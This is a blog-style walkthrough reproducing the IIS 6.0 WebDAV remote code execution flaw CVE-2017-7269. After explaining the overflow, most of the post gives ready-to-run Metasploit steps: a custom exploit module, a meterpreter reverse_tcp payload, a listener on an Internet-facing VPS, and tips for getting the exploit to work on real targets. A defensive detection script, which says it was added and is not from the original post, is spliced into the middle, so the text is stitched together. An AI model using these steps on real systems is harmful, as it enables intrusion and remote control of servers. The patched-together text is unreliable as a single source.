IIS6 remote code execution vulnerability reproduction CVE-2017-7269

Brief

CVE-2017-7269 is a stack overflow in IIS 6.0. While processing the WebDAV PROPFIND method, IIS 6.0 does not effectively check or limit the length of the URL, so the memcpy performed while building the virtual path overflows the stack buffer. This stack overflow can lead to remote code execution.

Test environment

  • Target system: Windows Server 2003
  • Attack system: Kali 2018.04
  • Reverse-shell host: Ubuntu 18.04 LTS

CVE-2017-7269 vulnerability principle

The trigger is a malicious PROPFIND request: when the If header field contains an overlong URL such as http://localhost/xxxx, a buffer overflow occurs (both a heap overflow and a stack overflow).

The specific location is in w3wp.exe, in the httpext module at the function ScStoragePathFromUrl.

  • A heap overflow occurs when memory is copied at httpext!ScStoragePathFromUrl+0x360;
  • The overflowed stack buffer is allocated at httpext!HrCheckIfHeader+0x0000013c;
  • The crash happens when execution returns from the function httpext!HrCheckIfHeader.
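A defender-side check for the pattern just described, as an added example that is not part of the original post or of any Metasploit module: it parses captured HTTP request heads and flags PROPFIND requests whose If: header carries a URL longer than an assumed threshold, which is the condition that reaches the unchecked copy in httpext!ScStoragePathFromUrl. IIS 6 W3C logs do not record the If: header, so the input is assumed to come from a reverse proxy, WAF or packet capture; the threshold value (MAX_IF_URL_LEN) and the sample requests are constructed for illustration.

```python
"""Added detection example (not code from the original post): flag WebDAV
PROPFIND requests whose If: header carries an oversized URL, the condition
that triggers the CVE-2017-7269 overflow in httpext!ScStoragePathFromUrl."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Assumed threshold: a legitimate WebDAV If: token is a short resource URL
# plus a lock token, so anything past this length is worth an alert.
MAX_IF_URL_LEN = 128

# URLs inside an If: header are written as <http://host/path>.
IF_URL_RE = re.compile(r"<(https?://[^>]*)>")


@dataclass
class Request:
    method: str
    target: str
    headers: Dict[str, str] = field(default_factory=dict)


def parse_request(raw: str) -> Request:
    """Parse the head of a raw HTTP/1.x request; header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers)


def check_request(req: Request) -> Optional[str]:
    """Return a reason string if the request matches the overflow pattern, else None."""
    if req.method.upper() != "PROPFIND":
        return None
    for url in IF_URL_RE.findall(req.headers.get("if", "")):
        if len(url) > MAX_IF_URL_LEN:
            return f"PROPFIND with oversized If: URL ({len(url)} bytes)"
    return None


def scan(raw_requests: List[str]) -> List[Tuple[int, str]]:
    """Run check_request over a batch; returns (index, reason) for each hit."""
    hits: List[Tuple[int, str]] = []
    for i, raw in enumerate(raw_requests):
        reason = check_request(parse_request(raw))
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample traffic: a plain GET, a normal WebDAV PROPFIND with a
# short If: token, and a PROPFIND whose If: URL is padded far past any
# legitimate length (300 arbitrary filler bytes, not real exploit data).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1\r\nHost: localhost\r\n\r\n",
    "PROPFIND /dav/doc.txt HTTP/1.1\r\nHost: localhost\r\n"
    "If: <http://localhost/dav/doc.txt> (<opaquelocktoken:example>)\r\n\r\n",
    "PROPFIND / HTTP/1.1\r\nHost: localhost\r\n"
    "If: <http://localhost/" + "A" * 300 + ">\r\n\r\n",
]

if __name__ == "__main__":
    for index, reason in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {reason}")
```

Only the third constructed request is reported; the benign PROPFIND with a normal resource URL and lock token passes, so the check keys on the oversized If: URL rather than on the PROPFIND method alone, which is common on legitimate WebDAV clients.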

Using the exploit in Metasploit 5

Loading a custom module into Metasploit

How to load a custom module

1. Custom modules live under $HOME/.msf4/modules/exploits/ in the home directory.
2. Copy the custom module into that directory, then run reload_all in msfconsole to reload the module paths.

Loading an exploit module from a URL

# Create the directory for the exploit
mkdir -p $HOME/.msf4/modules/exploits/test
# Load the example module
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb


# Loading the module from a URL
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1140    0  1140    0     0   3607      0 --:--:-- --:--:-- --:--:--  7808

Loading the exploit module from a local file

mkdir -p $HOME/.msf4/modules/exploits/test
cp cve-2017-7269.rb ~/.msf4/modules/exploits/test/test_module.rb

Metasploit commands for CVE-2017-7269

# Example usage
reload_all                        # load the custom module
use exploit/test/test_module.rb   # select the module by the path just loaded
show options                      # show the current options
set RHOST <target IP>             # target host IP
set HttpHost <site host name>     # target web site host name
set PhysicalPathLength <length>   # physical path length of the web site root
set payload windows/meterpreter/reverse_tcp # set the payload
set LHOST <listener IP>           # listener IP
exploit                           # run the exploit

# Actual use
reload_all
use exploit/test/test_module.rb
show options
set RHOST 192.168.221.147
set HttpHost 192.168.221.147
set PhysicalPathLength 8
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.221.133
exploit

Metasploit reverse shell

In a real engagement the shell is sent back to an Internet-facing VPS, so install Metasploit on the Ubuntu VPS.

# Download and install Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

# Example usage
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
exploit

# Actual use
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 103.85.24.14
set LPORT 4444
exploit

Put the meterpreter session into the background with the [background] command from the current shell, then bring it back up with the [sessions] command.

Issues seen on a real Windows Server 2003 target

  • Issue 1: the physical path length of the local site must be set correctly, otherwise the buffer overflow is not triggered. The figure (not reproduced here) shows an example with a path length of 8.
  • Issue 2: the two URLs in the If header must match the site binding; the POC fails if the domain and port inside the If header are inconsistent with the binding.
  • Issue 3: when IIS is bound to a domain name, that domain name needs to be written in.
  • Issue 4: when several sites share one application pool, running the exp against one site sometimes makes every site in that application pool return 500. Because each pool is an independent w3wp process, this can be detected from a neighbouring site on the same server, and another pool can then be attempted.

References

[1] MSF module description: https://www.offensive-security.com/metasploit-unleashed/modules-and-locations/
[2] MSF instructions: https://github.com/rapid7/metasploit-framework/wiki
[3] CVE-2017-7269: https://github.com/zcgonvh/cve-2017-7269
[4] IIS 6.0 remote code execution vulnerability reproduction (CVE-2017-7269): https://blog.csdn.net/darkhq/article/details/79127820
[5] Privilege escalation with CVE-2017-7269 IIS6_WebDAV remote code execution: https://anquan.baidu.com/article/391
[6] https://www.ivoidwarranties.tech/posts/pentesting-tuts/metasploit/simple-attack/
[7] https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework
[8] Several tricks for CVE-2017-7269 and bug fixes: https://www.secpulse.com/archives/57264.html


Source: www.cnblogs.com/17bdw/p/11874484.html